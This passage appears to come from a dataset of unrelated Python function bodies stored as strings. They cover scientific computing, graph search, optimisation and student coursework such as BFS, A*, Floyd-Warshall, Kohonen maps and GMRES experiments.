\"Corresponding koTimes not included with koMap.\"\r\n kogoodStart = koMap.T\r\n [nn, mm] = np.shape(koMap)\r\n\r\n fZmins = np.ones([nn, mm]) * sys.float_info.max\r\n fZtypes = np.ones([nn, mm]) * sys.float_info.max\r\n # Find inds Entering, exiting ko\r\n # i = 0 # star ind\r\n for k in np.arange(len(sInds)):\r\n i = sInds[k] # Star ind\r\n\r\n # double check this is entering\r\n indsEntering = list(\r\n np.where(np.diff(kogoodStart[:, i].astype(int)) == -1.0)[0]\r\n )\r\n\r\n # without the +1, this gives kogoodStart[indsExiting,i] = 0 meaning\r\n # the stars are still in keepout\r\n indsExiting = (\r\n np.where(np.diff(kogoodStart[:, i].astype(int)) == 1.0)[0] + 1\r\n )\r\n indsExiting = [\r\n indsExiting[j] if indsExiting[j] < len(kogoodStart[:, i]) - 1 else 0\r\n for j in np.arange(len(indsExiting))\r\n ] # need to ensure +1 increment doesn't exceed kogoodStart size\r\n\r\n # Find inds of local minima in fZ\r\n fZlocalMinInds = (\r\n np.where(np.diff(np.sign(np.diff(fZ_matrix[i, :]))) > 0)[0] + 1\r\n ) # Find local minima of fZ, +1 to correct for indexing offset\r\n # Filter where local minima occur in keepout region\r\n fZlocalMinInds = [ind for ind in fZlocalMinInds if kogoodStart[ind, i]]\r\n\r\n # Remove any indsEntering/indsExiting from fZlocalMinInds\r\n tmp1 = set(list(indsEntering) + list(indsExiting))\r\n # remove anything in tmp1 from fZlocalMinInds\r\n fZlocalMinInds = list(set(list(fZlocalMinInds)) - tmp1)\r\n\r\n minInds = (\r\n np.append(np.append(indsEntering, indsExiting), fZlocalMinInds)\r\n ).astype(int)\r\n\r\n if np.any(minInds):\r\n fZmins[i, minInds] = fZ_matrix[i, minInds]\r\n fZtypes[i, indsEntering] = 0\r\n fZtypes[i, indsExiting] = 1\r\n fZtypes[i, fZlocalMinInds] = 2\r\n\r\n with open(cachefname, 
\"wb\") as fo:\r\n pickle.dump({\"fZmins\": fZmins, \"fZtypes\": fZtypes}, fo)\r\n self.vprint(\"Saved cached fZmins to %s\" % cachefname)\r\n\r\n return fZmins, fZtypes", "def get_RM_K(vsini_kms, rp_Rearth, Rs_Rsun):\n D = (rp_Rearth * u.Rearth.to(u.m) / Rs_Rsun * u.Rsun.to(u.m)) ** 2\n return (vsini_kms * D / (1 - D)) * 1e3", "def _local_search(self):\n\n # Set occupancies of rigid cluster and its direct neighboring atoms to\n # 1 for clash detection and MIQP\n selection = self.ligand._selection\n self.ligand._active[selection] = True\n center = self.ligand.coor[self._cluster].mean(axis=0)\n new_coor_set = []\n new_bs = []\n for coor, b in zip(self._coor_set, self._bs):\n self.ligand._coor[selection] = coor\n self.ligand._b[selection] = b\n rotator = GlobalRotator(self.ligand, center=center)\n for rotmat in RotationSets.get_local_set():\n rotator(rotmat)\n translator = Translator(self.ligand)\n iterator = itertools.product(\n *[np.arange(*trans) for trans in self._trans_box]\n )\n for translation in iterator:\n translator(translation)\n new_coor = self.ligand.coor\n if self.options.remove_conformers_below_cutoff:\n values = self.xmap.interpolate(new_coor)\n mask = self.ligand.e != \"H\"\n if np.min(values[mask]) < self.options.density_cutoff:\n continue\n if self.options.external_clash:\n if not self._cd() and not self.ligand.clashes():\n if new_coor_set:\n delta = np.array(new_coor_set) - np.array(new_coor)\n if (\n np.sqrt(\n min(np.square((delta)).sum(axis=2).sum(axis=1))\n )\n >= self.options.rmsd_cutoff\n ):\n new_coor_set.append(new_coor)\n new_bs.append(b)\n else:\n new_coor_set.append(new_coor)\n new_bs.append(b)\n elif not self.ligand.clashes():\n if new_coor_set:\n delta = np.array(new_coor_set) - np.array(new_coor)\n if (\n np.sqrt(min(np.square((delta)).sum(axis=2).sum(axis=1)))\n >= self.options.rmsd_cutoff\n ):\n new_coor_set.append(new_coor)\n new_bs.append(b)\n else:\n new_coor_set.append(new_coor)\n new_bs.append(b)\n self.ligand._active[self.ligand._selection] = False\n selection = self.ligand._selection[self._cluster]\n self.ligand._active[selection] = True\n for atom in self._cluster:\n atom_sel = self.ligand._selection[self.ligand.connectivity[atom]]\n self.ligand._active[atom_sel] = True\n self.conformer = self.ligand\n self._coor_set = new_coor_set\n self._bs = new_bs\n if len(self._coor_set) < 1:\n logger.warning(\n f\"{self.ligand.resn[0]}: \"\n f\"Local search {self._cluster_index}: {len(self._coor_set)} conformers\"\n )\n return\n\n # QP score conformer occupancy\n logger.debug(\"Converting densities.\")\n self._convert()\n self._solve_qp()\n logger.debug(\"Updating conformers\")\n self._update_conformers()\n if self.options.write_intermediate_conformers:\n self._write_intermediate_conformers(prefix=\"localsearch_ligand_qp\")\n if len(self._coor_set) < 1:\n logger.warning(\n f\"{self.ligand.resn[0]}: \"\n f\"Local search QP {self._cluster_index}: {len(self._coor_set)} conformers\"\n )\n return\n\n # MIQP score conformer occupancy\n self._convert()\n self._solve_miqp(\n threshold=self.options.threshold, cardinality=self.options.cardinality\n )\n self._update_conformers()\n if self.options.write_intermediate_conformers:\n self._write_intermediate_conformers(prefix=\"localsearch_ligand_miqp\")", "def breadthFirstSearch(problem):\r\n\t\"*** YOUR CODE HERE ***\"\r\n\tfrom game import Directions\r\n\t#i = 0\r\n\tfrontera=util.Queue()\r\n\testadoInicial= problem.getStartState()\r\n\tfrontera.push((estadoInicial, 
[],0))\r\n\tvisitados=[]\r\n\tvisitados.append(estadoInicial)\r\n\r\n\twhile not(frontera.isEmpty()):\r\n\t\t(estado, camino, costo) =frontera.pop()\r\n\t\tif(problem.isGoalState(estado)):\r\n\t\t\tbreak\r\n\r\n\t\tsucesores=problem.getSuccessors(estado)\r\n\t\tfor sucesor in sucesores:\r\n\t\t\t#i = i+1\r\n\t\t\t#print (i)\r\n\t\t\tif sucesor[0] not in visitados:\r\n\t\t\t\tfrontera.push((sucesor[0], camino + [sucesor[1]], costo + sucesor[2]))\r\n\t\t\t\tvisitados.append(sucesor[0])\r\n\tprint ('Number of nodes in memory: {}').format(len(frontera.list))\r\n\treturn camino", "def solve(self):\n # check for jacobian and set it if present and to be used\n if self.use_sparse:\n if self._use_jac and hasattr(self.problem,'sparse_jac'):\n jac = self.problem.sparse_jac\n else:\n jac = None\n else:\n if self._use_jac and hasattr(self.problem,'jac'):\n jac = self.problem.jac\n else:\n jac = None\n \n # Initialize solver and solve \n \n solved = False\n local_min = False\n\n res = N.zeros(self.x0.__len__())\n while (not solved) and self.reg_count < 2:\n try:\n if self._use_fscale:\n self.solver.KINSOL_init(self.func,self.x0,self.dim,jac,self.constraints,self.use_sparse,self.verbosity,self.norm_of_res,self.reg_param,self.fscale)\n else:\n self.solver.KINSOL_init(self.func,self.x0,self.dim,jac,self.constraints,self.use_sparse,self.verbosity,self.norm_of_res,self.reg_param,None)\n start = time.clock()\n res = self.solver.KINSOL_solve(not self._use_ls)\n stop = time.clock()\n self.exec_time += (stop - start)\n solved = True\n except KINError as error:\n if error.value == 42:\n # Try the heuristic\n if hasattr(self.problem, 'get_heuristic_x0'):\n print \"----------------------------------------------------\"\n print \" Solver stuck with zero step-length.\"\n print \"----------------------------------------------------\"\n print \"The following variables have start value zero\"\n print \"and min set to zero causing the zero step-length.\"\n print \"These settings are either set by default or by user.\"\n print \"\"\n\n self.x0 = self.problem.get_heuristic_x0()\n self.reg_count += 1\n \n print \"\"\n print \"This setting (start and min to zero) can often\"\n print \"cause problems when initializing the system. \"\n print \"\"\n print \"To avoid this the above variables have\"\n print \"their start attributes reset to one.\"\n print \"\"\n print \"Trying to solve the system again...\"\n else:\n raise KINSOL_Exception(\"Regularization failed due to constraints, tried getting heuristic initial guess but failed.\")\n \n\n elif (error.value == 2):\n print \"---------------------------------------------------------\"\n print \"\"\n print \" !!! 
WARNING !!!\"\n print \"\"\n print \" KINSOL has returned a result but the algorithm has converged\"\n print \" to a local minimum, the initial values are NOT consistent!\"\n print \"\"\n print \"---------------------------------------------------------\"\n solved = True\n local_min = True\n else:\n # Other error, send onward as exception\n self.problem.check_constraints(res)\n raise KINSOL_Exception(error.msg[error.value])\n \n if not solved:\n self.solver.Free_KINSOL()\n raise KINSOL_Exception(\"Algorithm exited solution loop without finding a solution, please contact Assimulo support.\")\n\n if self.check_with_model:\n self.problem.check_constraints(res)\n if not local_min:\n print \"Problem sent to KINSOL solved.\"\n \n return res", "def compute_backpointers(s0, s1): #Builds an array of backpointers\r\n if s0 == None or s1 == None:\r\n raise Exception('Both s0 and s1 have to be set')\r\n rows = len(s0)+1 # the number of rows\r\n columns = len(s1)+1 # the number of columns\r\n\r\n ####### Build the Levenshtein matrix ########\r\n # Create an empty matrix filled with zeros\r\n distance = [[0 for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # Fill the outer layers of the matrix 0 -> len(str) vertically and horizontally\r\n for i in range(1,rows):\r\n distance[i][0] = i\r\n for i in range(1,columns):\r\n distance[0][i] = i\r\n\r\n # Compute the costs for every position inside the matrix and insert them;\r\n # checks whether the letter at the index is the same in both words, in which case it costs 0\r\n # and gets the same value as the diagonal before it; otherwise it costs 1 from above or below.\r\n for column in range(1,columns):\r\n for row in range(1,rows): # check every row in each column\r\n if s0[row-1] == s1[column -1]: # if the letters are the same it costs 0\r\n c = 0\r\n else: # otherwise it costs 2\r\n c = 2\r\n distance[row][column] = min(distance[row-1][column] + 1,distance[row][column-1] + 1,distance[row-1][column-1] + c)\r\n # the line above says that the minimum of the value above or beside + 1, or the diagonal before plus (0 or 2),\r\n # is inserted at this position in the matrix.\r\n\r\n # the minimum distance is\r\n cost = distance[row][column]\r\n print(\"the total cost is\")\r\n print(cost)\r\n\r\n\r\n ####### Build the backptr matrix ########\r\n # Create an empty matrix of [0,0] entries for the backptr matrix\r\n backptr = [[[0, 0] for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # walk through the positions of the Levenshtein matrix backwards\r\n for column in range(columns-1,0,-1):\r\n for row in range(rows-1,0,-1):\r\n # If the value to the left is the smallest: point left\r\n if distance[row][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row\r\n backptr[row][column][1] = column -1\r\n # If the value above is the smallest: point up\r\n if distance[row-1][column] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row -1\r\n backptr[row][column][1] = column\r\n # if the diagonal value is the smallest: point diagonally\r\n if distance[row-1][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row-1\r\n backptr[row][column][1] = column -1\r\n\r\n # Fill the outer values of the matrix (NB: not actually needed)\r\n for i in range(0,rows):\r\n j = i-1\r\n backptr[i][0][0] = j\r\n backptr[i][0][1] = 0\r\n for i in range(0,columns):\r\n j = i-1\r\n backptr[0][i][1] = j\r\n backptr[0][i][0] = 0\r\n\r\n return backptr", "def 
solution(n, s, a, b, fares):\n\n table = [[float(\"inf\")]*n for _ in range(n)]\n for (c, d, f) in fares:\n table[c-1][d-1] = f\n table[d-1][c-1] = f\n\n for idx in range(n):\n table[idx][idx] = 0\n\n # run Floyd-Warshall to find all shortest paths\n for kdx in range(n):\n for idx in range(n):\n for jdx in range(n):\n table[idx][jdx] = min(table[idx][jdx], table[idx][kdx] + table[kdx][jdx])\n \n# for row in table:\n# print(row)\n \n answer = table[s-1][a-1] + table[s-1][b-1]\n # print(\"separate:\", answer)\n for idx in range(n):\n # print(\"via idx:\", idx, table[s-1][idx] + table[idx][a-1] + table[idx][b-1])\n answer = min(answer, table[s-1][idx] + table[idx][a-1] + table[idx][b-1])\n\n # print(\"answer:\", answer)\n return answer", "def kruskal(self):\n k = self.cc().max() + 1\n E = 2 * self.V - 2\n V = self.V\n Kedges = np.zeros((E, 2)).astype(np.int_)\n Kweights = np.zeros(E)\n iw = np.argsort(self.weights)\n label = np.arange(V)\n j = 0\n for i in range(V - k):\n a, b = self.edges[iw[j]]\n d = self.weights[iw[j]]\n while label[a] == label[b]:\n j = j + 1\n a, b = self.edges[iw[j]]\n d = self.weights[iw[j]]\n\n if label[a] != label[b]:\n lb = label[b]\n label[label == lb] = label[a]\n Kedges[2 * i] = np.array([a, b])\n Kedges[2 * i + 1] = np.array([b, a])\n Kweights[2 * i: 2 * i + 2] = d\n\n K = WeightedGraph(V, Kedges, Kweights)\n return K", "def find_rsh(v, j):\r\n\r\n zp = sp.where(v[:-1] * v[1:] <= 0)[0][0] #make a list of A[x] * A[x-1] without using a \"for\" loop as in the original python.\r\n m = np.polyfit(v[(zp - 5):(zp + 5)], j[(zp -5):(zp + 5)], 1)\r\n return 1/abs(m[0]) * 1000 #[Ohm cm^2]\r", "def problem2(self, s):\n \n points = self.neighbor(100, 10, s.exhaustive_search)\n points += self.neighbor(10, 100, s.exhaustive_search)\n points += 1\n\n _testDriver.get_code(s.exhaustive_search)\n print \"\\n(Check that scipy.spatial.KDTree is not used)\"\n points *= self.grade(1)\n\n return points", "def cluster_centres_ska_v5(r_min=None, r_max=None):\n # Spiral parameters for inner and outer regions.\n num_arms = 3\n num_per_arm = 5\n start_inner = 417.82\n end_inner = 1572.13\n b_inner = 0.513\n theta0_inner = -48\n start_outer = 2146.78\n end_outer = 6370.13\n b_outer = 0.52\n theta0_outer = 135\n x_inner, y_inner = TelescopeLayout.symmetric_log_spiral(\n num_per_arm, start_inner, end_inner, b_inner, num_arms,\n theta0_inner)\n x_outer, y_outer = TelescopeLayout.symmetric_log_spiral(\n num_per_arm, start_outer, end_outer, b_outer, num_arms,\n theta0_outer)\n x = np.concatenate((x_inner, x_outer))\n y = np.concatenate((y_inner, y_outer))\n r = (x**2 + y**2)**0.5\n arm_index = [i // num_per_arm for i in range(num_per_arm * num_arms)]\n arm_index = np.hstack((arm_index, arm_index))\n\n # Sort by radius and remove the 3 innermost stations.\n idx = r.argsort()\n x = x[idx]\n y = y[idx]\n r = r[idx]\n arm_index = arm_index[idx]\n x, y, r, arm_index = (x[3:], y[3:], r[3:], arm_index[3:])\n\n if r_min and r_max:\n idx = np.where(np.logical_and(r >= r_min, r <= r_max))\n x, y, arm_index = x[idx], y[idx], arm_index[idx]\n elif r_min:\n idx = np.where(r >= r_min)\n x, y, arm_index = x[idx], y[idx], arm_index[idx]\n elif r_max:\n idx = np.where(r <= r_max)\n x, y, arm_index = x[idx], y[idx], arm_index[idx]\n return x, y, arm_index", "def search(self):\n W = np.zeros((self.subsets.shape[0],)) \n for i,E in enumerate(self.subsets):\n self.graph.setV(E) # set the nodes to their values\n W[i] = self.graph.computeW()\n self.Ws = W", "def path_search(start, goal):\n if start == goal:\n return [start]\n explored = 
{}\n explored[start] = 2\n queue = [ [start, ('', 0)] ]\n bestPath = [start, ('', 1110)]\n bestPathList = []\n total = 0\n costSearchingNow = 0\n while queue:\n total += 1\n # if total>40000:\n # return -1,' fail'\n if queue[0][-1][-1] != costSearchingNow:\n \tqueue.sort(key=lambda path:path[-1][-1])\n \n path = queue.pop(0)\n costSearchingNow = path[-1][-1]\n s = path[-2]\n # print len(queue)\n # cout(path)\n # print queue\n\n if s == goal:\n bestPath = path\n # print 'Find one best path ↑'\n bestPathList.append(bestPath)\n if len(queue)==0:\n # print '~~~~',total,getString \n return total,getString(bestPathList,start,goal)\n else:\n if path[-1][-1] > bestPath[-1][-1]:\n return total,getString(bestPathList,start,goal)\n\n linenum, changetimes = path[-1]\n \n for state, actions in sh_subway[s].items():\n for action in actions:\n linechange = changetimes + 1\n if linenum != action:\n linechange += changePunishment\n path2 = path[:-1] + [action, state, (action, linechange)]\n\n if (path2[-1][-1]-len(path2)/2-1)/changePunishment <= 4:\n if len(path2)>6:\n if (path2[-2] == '上海赛车场' and path2[-4]=='嘉定新城' and path2[-6]=='马陆') or (path2[-6] == '上海赛车场' and path2[-4]=='嘉定新城' and path2[-2]=='马陆') or (path2[-2] == '龙柏新村' and path2[-4]=='龙溪路' and path2[-6]=='水城路') or (path2[-6] == '龙柏新村' and path2[-4]=='龙溪路' and path2[-2]=='水城路'):\n linechange -= changePunishment\n path2 = path[:-1] + [action, state, (action, linechange)]\n\n if path2.count(state)<=1:\n if state not in explored:\n explored[state] = linechange\n queue.append(path2)\n \n elif linechange <= explored[state]+changePunishment: # consider arriving at the destination right away\n \n explored[state] = linechange\n queue.append(path2)\n\n\n return total,getString(bestPathList,start,goal)", "def aestrella(inicio,obj):\n nodos_abiertos=[inicio]\n nodos_cerrados=[]\n lista1=[]\n for cel in nodos_abiertos:\n lista1.append(cel.costo)\n m=min(lista1)\n for j in nodos_abiertos:\n j.set_gscore(g(inicio,j))\n j.set_hscore(h(j,obj))\n j.set_fscore(f(inicio,obj))\n if j.fscore==m:\n if j==obj:\n print 'done'\n nodos_cerrados.append(j)\n else:\n nodos_abiertos.append(j)\n for k in j.vecinos:\n if k in nodos_cerrados :\n gk=k.gscore\n gk1=k.get_gscore()\n if gk1<=gk:\n k.set_gscore=gk1\n j=k\n else:\n pass\n elif k in nodos_abiertos:\n gk=k.gscore\n gk1=k.get_gscore\n if gk1<=gk:\n k.set_gscore=gk1\n j=k\n else:\n pass\n \n else:\n nodos_abiertos.append(k)\n k.set_gscore()\n else:\n pass\n ruta=[] \n for u in nodos_cerrados:\n lnc=len(nodos_cerrados)\n for v in range(lnc):\n ruta.insert(v,nodos_cerrados[lnc-v])\n return ruta", "def cluster(self):\n\n result_nominatim = self.nominatim()\n try:\n coord = [(float( i['lat'] ), float( i['lon'] )) for i in result_nominatim]\n except:\n return None\n #print( \"coord\", coord )\n kms_per_radian = 6371.0088\n # Increasing this value increases the number of elements in a cluster and changes the results\n epsilon = 2 / kms_per_radian\n # Adapt the number of clusters (min_samples) to the number of entities in the array?\n db = DBSCAN( eps=epsilon, min_samples=1, algorithm='ball_tree',\n metric='haversine' ).fit( np.radians( coord ) )\n cluster_labels = db.labels_\n #print( \"cluster\", cluster_labels )\n num_clusters = len( set( cluster_labels ) )\n #print( \"num clusters\", num_clusters )\n counts = np.bincount( cluster_labels )\n #print( \"count\", counts )\n maxi = np.argmax( counts )\n #print( \"maxi\", maxi )\n itemindex = np.where( cluster_labels == maxi )[0]\n #print( \"itemindex\", itemindex )\n\n lat: List[float] = [float( 
result_nominatim[index]['lat'] ) for index in itemindex]\n lon: List[float] = [float( result_nominatim[index]['lon'] ) for index in itemindex]\n\n # take the mean of the coordinates of the largest cluster. This mean is equivalent to the centroid:\n # https://gis.stackexchange.com/questions/12120/calculate-midpoint-from-a-series-of-latitude-and-longitude-coordinates\n\n average = {\"lat\": sum( lat ) / len( lat ), \"lon\": sum( lon ) / len( lon )}\n\n #print( list( zip( cluster_labels, [x['display_name'] for x in results] ) ) )\n #print( \"closest to the mean\", closest( results, average ) )\n return closest( result_nominatim, average )", "def zero_K(self):\n # print('zero_K axnode: ', self.cell.axnode)\n i = 0\n for node in self.cell.axnode:\n for seg in node:\n if i == 0:\n print(f\"KLT: {seg.klt.gbar:.6f} mho/cm2\")\n print(f\"KCNQ: {seg.kcnq.gbar:.6f} mho/cm2\")\n print(f\"KHT: {seg.kht.gbar:.6f} mho/cm2\")\n i = 1\n # seg.klt.gbar = 0e-3\n seg.kcnq.gbar = 0e-3\n # seg.kcnq.phi_m = seg.kcnq.phi_m - 20.\n # seg.kht.gbar = 0e-3\n # seg.kht.vshift = -20.\n pass", "def calculate_path(self):\n #Repeat the cycle the specified number of times\n for i in range(self.iterations):\n for ant in self.ants:\n ant.setup_ant()\n while not ant.final_node_reached:\n #Randomly select the node to visit\n node_to_visit = self.select_next_node(self.map.nodes_array[int(ant.actual_node[0])][int(ant.actual_node[1])])\n #Move the ant to the randomly chosen next node\n ant.move_ant(node_to_visit)\n #Check whether the solution has been reached\n ant.is_final_node_reached()\n #Add the resulting route to the list of routes\n self.add_to_path_results(self.delete_loops(ant.get_visited_nodes()))\n # Enable the ant for another search\n ant.enable_start_new_path()\n \n # Update the global pheromone level\n self.pheromone_update()\n self.best_result = self.paths[0]\n\n #Empty the list of routes\n self.empty_paths()\n print('Iteration: ', i, 'length of the path: ', len(self.best_result))\n return self.best_result", "def kohonen():\n# plb.close('all')\n \n dim = 28*28\n data_range = 255.0\n \n # load in data and labels \n data = np.array(np.loadtxt('data.txt'))\n labels = np.loadtxt('labels.txt')\n\n # select 4 digits \n name = \"Stettler\"\n targetdigits = name2digits(name) # assign the four digits that should be used\n print(targetdigits) # output the digits that were selected\n\n # this selects all data vectors that correspond to one of the four digits\n data = data[np.logical_or.reduce([labels==x for x in targetdigits]),:]\n \n dy, dx = data.shape\n \n #set the size of the Kohonen map. 
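The map is a square grid of size_k x size_k units, each holding one prototype vector of dimension dim. 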
In this case it will be 6 X 6\n size_k = 6\n \n #set the width of the neighborhood via the width of the gaussian that\n #describes it\n sigma = 2.0\n \n #initialise the centers randomly\n centers = np.random.rand(size_k**2, dim) * data_range\n \n #build a neighborhood matrix\n neighbor = np.arange(size_k**2).reshape((size_k, size_k))\n\n #set the learning rate\n eta = 0.9 # HERE YOU HAVE TO SET YOUR OWN LEARNING RATE\n \n #set the maximal iteration count\n tmax = 5000 # this might or might not work; use your own convergence criterion\n \n #set the random order in which the datapoints should be presented\n i_random = np.arange(tmax) % dy\n np.random.shuffle(i_random)\n \n for t, i in enumerate(i_random):\n som_step(centers, data[i,:],neighbor,eta,sigma)\n\n # for visualization, you can use this:\n for i in range(size_k**2):\n plb.subplot(size_k,size_k,i+1)\n \n plb.imshow(np.reshape(centers[i,:], [28, 28]),interpolation='bilinear')\n plb.axis('off')\n \n # leave the window open at the end of the loop\n plb.show()\n plb.draw()", "def _getscanind(self):\n \n zamin = self.za.min()\n first = np.where(self.za==zamin)[0]\n self.scan = np.zeros(self.spec.shape[0])\n if zamin < 0:\n cs = first[np.where((first - np.roll(first, 1)) != 1)[0]]\n ss = first[np.where((np.roll(first,-1) - first) != 1)[0]] + 1\n ce = ss \n se = np.roll((cs - 1) % self.za.size, -1) + 1\n for k, val in enumerate(cs):\n self.scan[val:se[k] + 1] = k\n else:\n moves = np.diff(self.za)\n max_ind = np.where(moves==moves.max())[0]\n turnover = self.za.size\n diffs = np.diff(max_ind)\n if np.unique(diffs).size > 1:\n raise ValueError, 'Can\\'t deal with non-uniform cal data yet.'\n if max_ind.size > 1:\n turnover = diffs[0]\n cs = ce = np.array([])\n ss = np.arange(self.za.size)[::turnover]\n se = np.roll((ss - 1) % self.za.size, -1)\n for k, val in enumerate(ss):\n self.scan[val:se[k] + 1] = k\n \n self.ind = {'cs': cs, 'ce': ce, 'ss': ss, 'se': se}\n self.nscan = np.unique(self.scan).size", "def find_best_k(data, anots, neighbours_range):\r\n \r\n best_k = 0\r\n best_acc = 0\r\n for n_neighbors in neighbours_range:\r\n accur = iterate_over_chanels(data, anots, n_neighbors)\r\n mean_acc = accur.mean()\r\n if mean_acc > best_acc:\r\n best_acc = mean_acc\r\n best_k = n_neighbors\r\n return best_k", "def question27():\n global conv_residuals\n def catch(r):\n \"\"\"Helper function to retrieve residual + steps to convergence for\n GMRES operation in Scipy. 
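Each call appends the current residual to the global conv_residuals list, so its length gives the number of iterations. 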
Used as a callback function for\n scipy.sparse.linalg.gmres\n \"\"\"\n global conv_residuals\n conv_residuals.append(r)\n return\n\n def iterate(rk):\n \"\"\" Preconditioner Function for GMRES.\"\"\"\n y = scipy.sparse.linalg.spsolve(P1, rk)\n RHS = scipy.sparse.csr_matrix.dot(P4, y) + rk\n zk = scipy.sparse.linalg.spsolve(P3, RHS)\n return zk\n\n\n N_search = np.array([20, 40, 60, 80, 100, 120, 140, 160, 180])\n steps_till_conv_N = np.zeros(N_search.size)\n\n fig271 = plt.figure(figsize=(13, 8))\n\n for i, n in enumerate(N_search):\n n2 = n**2\n A = construct_matrix_A(n)\n b = np.random.randn(n2)\n M, N = construct_M_N(n)\n mu_max = scipy.sparse.linalg.eigs(M, k=1, which='LM', return_eigenvectors=False)[0].real\n mu_min = scipy.sparse.linalg.eigs(M, k=1, which='SM', return_eigenvectors=False)[0].real\n gamma = np.sqrt(mu_max*mu_min)\n gammaI = scipy.sparse.diags((gamma,), (0,), shape=(n2, n2), format=\"csr\")\n P1 = gammaI + M\n P2 = gammaI - N\n P3 = gammaI + N\n P4 = gammaI - M\n M = scipy.sparse.linalg.LinearOperator((n2, n2), matvec=iterate)\n conv_residuals = []\n x = scipy.sparse.linalg.gmres(A, b, M=M, callback=catch)\n steps_till_conv_N[i] += len(conv_residuals)\n n_steps = len(conv_residuals)\n plt.semilogy(range(n_steps), conv_residuals, label=f\"N = {n}\")\n\n plt.xlabel(\"Steps Required for Convergence\")\n plt.ylabel(\"Residuals\")\n plt.title(\"Figure 271 - GMRES + Preconditioner Residuals for Varying N\", fontsize=13)\n plt.legend()\n plt.grid()\n plt.savefig(f\"figures/figure271.png\")\n plt.show()\n\n\n fig270 = plt.figure(figsize=(13, 8))\n plt.plot(N_search, steps_till_conv_N)\n plt.xlabel(\"N\")\n plt.ylabel(\"Steps until convergence\")\n plt.title(\"Figure 270 - GMRES + Preconditioner Convergence Required for Varying N\", fontsize=13)\n plt.grid()\n plt.savefig(f\"figures/figure270.png\")\n plt.show()\n return", "def resoudre(self):\n #create the root node\n #collections.deque is a list-like container that supports\n # fast appends and pops at either end\n queue = collections.deque([Node(self.start)])\n #vu holds the nodes already encountered\n vu = set()\n vu.add(queue[0].state)\n while queue:\n #the node that comes out depends on the score (h+g, seen previously),\n queue = collections.deque(sorted(list(queue), key=lambda node: node.f))\n # we take the lowest score to get closer to the goal, which has a score of 0\n node = queue.popleft()\n #check whether it equals the goal state, i.e. the puzzle = [1,2,3,4,5,6,7,8,0]\n if node.resolu:\n return node.chemin\n\n #if it is not the goal state, look at the possible child nodes\n # by trying every direction (up, down, left, right)\n for deplacement, action in node.actions:\n child = Node(deplacement(), node, action)\n\n if child.state not in vu:\n #add the child node to the queue\n queue.appendleft(child)\n vu.add(child.state)", "def findSubsetIndices(grdMODEL, min_lat, 
max_lat, min_lon, max_lon):\n\n\n if min_lon<0 and max_lon>0:\n splitExtract = True; Turns=2\n grdMODEL.splitExtract=splitExtract\n else:\n splitExtract = False; Turns=1\n grdMODEL.splitExtract=splitExtract\n grdMODEL.lon = np.where(grdMODEL.lon>180,grdMODEL.lon-360,grdMODEL.lon)\n \n # Array to store the results returned from the function\n res=np.zeros((Turns,4),dtype=np.float64)\n \n lats=grdMODEL.lat[:,0]\n lons=grdMODEL.lon[0,:]\n\n \n for k in range(Turns):\n\n if k==0 and splitExtract == True:\n minLon=min_lon; maxLon=0\n minLon=minLon+360\n maxLon=maxLon+360\n elif k==1 and splitExtract == True:\n minLon=0; maxLon=max_lon\n else:\n minLon=min_lon; maxLon=max_lon\n \n distances1 = []\n distances2 = []\n indices=[]\n index=1\n for point in lats:\n s1 = max_lat-point # (vector subtract)\n s2 = min_lat-point # (vector subtract)\n distances1.append((np.dot(s1, s1), point, index))\n distances2.append((np.dot(s2, s2), point, index-1))\n index=index+1\n\n distances1.sort()\n distances2.sort()\n indices.append(distances1[0])\n indices.append(distances2[0])\n \n distances1 = []\n distances2 = []\n index=1\n \n for point in lons:\n s1 = maxLon-point # (vector subtract)\n s2 = minLon-point # (vector subtract)\n distances1.append((np.dot(s1, s1), point, index))\n distances2.append((np.dot(s2, s2), point, index-1))\n index=index+1\n \n distances1.sort()\n distances2.sort()\n indices.append(distances1[0])\n indices.append(distances2[0])\n\n # Save final product: max_lat_indices,min_lat_indices,max_lon_indices,min_lon_indices\n minJ=indices[1][2]\n maxJ=indices[0][2]\n minI=indices[3][2]\n maxI=indices[2][2]\n \n res[k,0]=minI; res[k,1]=maxI; res[k,2]=minJ; res[k,3]=maxJ;\n\n # Save final product: max_lat_indices,min_lat_indices,max_lon_indices,min_lon_indices\n grdMODEL.indices=res", "def findRings(graph):\n # TODO add a planarity check?\n rings5 = []\n rings6 = []\n if DEBUG: print \"- starting ring detection...\"\n for head in graph.keys():\n tier1 = graph[head]\n tier2 = []\n tier3 = []\n # populate tier2 \n for node1 in tier1:\n for tmp in graph[node1]:\n if not tmp == head and not tmp in tier2 and (not tmp in tier1) :\n tier2.append(tmp)\n # populate tier3\n for node2 in tier2:\n for tmp in graph[node2]:\n if (not tmp == head) and (not tmp in tier2) and (not tmp in tier1) and (not tmp in tier3):\n tier3.append(tmp)\n # 6 member rings\n for x in tier3:\n candidate = []\n for c in tier2:\n if x in graph[c]:\n if not c in candidate:\n candidate.append(c)\n if len(candidate) >1:\n r6 = [ head ] \n r6.append(x)\n r6 += candidate\n for c in candidate:\n r6 += intersect( graph[head], graph[c])\n r6.sort()\n if not r6 in rings6:\n rings6.append( r6 )\n if DEBUG: print \" 6-member!\", r6\n break\n # 5 member rings\n for c1 in tier2:\n for c2 in tier2:\n if not c1 == c2:\n if (c2 in graph[c1]) and (c1 in graph[c2]):\n is_3_ring = False\n for k in graph[c1]:\n if k in graph[c2]: \n is_3_ring =True\n if DEBUG: print \" [ ...caught a cycle_3... 
